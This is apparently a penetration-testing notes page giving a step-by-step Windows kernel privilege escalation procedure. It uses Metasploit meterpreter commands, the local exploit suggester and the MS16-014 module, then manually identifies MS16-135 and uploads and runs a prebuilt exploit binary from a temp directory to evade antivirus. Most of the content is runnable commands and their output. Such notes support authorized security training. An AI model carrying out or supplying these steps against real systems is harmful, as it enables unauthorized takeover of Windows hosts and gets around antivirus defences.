Win Kernel Privesc

Get access to the target and gain a meterpreter session and then follow the following technique :-

#Local Privilege Escalation

# From the meterpreter session
getprivs

    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege

getsystem
    [-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    [-] Named Pipe Impersonation (RPCSS variant)
    [-] Named Pipe Impersonation (PrintSpooler variant)
    [-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
# failed

Enumerate Windows Kernel vulnerabilities with Metasploit

Copy

background
search suggester
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 7
run

e.g. Windows WMI Receive Notification Exploit - ms16_014_wmi_recv_notif
- This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl

use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422
exploit

By using a kernel exploit for this specific version of Windows O.S., the attacker is able to get a meterpreter session with elevated privileges.

#Manual Privilege Escalation

Windows-Exploit-Suggester

Open a Kali VM terminal session and use Windows-Exploit-Suggester

mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
    [*] initiating winsploit version 3.3...
    [+] writing to file 2023-03-15-mssb.xls
    [*] done
pip install xlrd --upgrade

Use https://cloudconvert.com/xlsx-to-xls to convert the 2023-03-15-mssb.xls file to .xlsx and back to .xls
Run the script

Copy

./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt

MS16-135

[E]MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]  https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]  https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]  https://github.com/tinysec/public/tree/master/CVE-2016-7255

Search MS16-135 in the windows-kernel-exploits github repository
- MS16-135 exploit
- check the 41015.c C file to check if the code does what it's supposed to
- in this case I will use the pre-build executable 41015.exe
Knowing that the specific Windows version is vulnerable to this particular exploit, proceed with the exploitation

Use the meterpreter access to upload the 41015.exe file to the temp directory within the Windows O.S.

cd C:\\
mkdir temp
cd temp\\
# Reduce the likelihood of antivirus detection by using the temp directory

upload 41015.exe
shell
.\41015.exe 7

PreviousWindows Privilege Escalation NextUAC Bypass Akagai64.exe

Last updated 1 year ago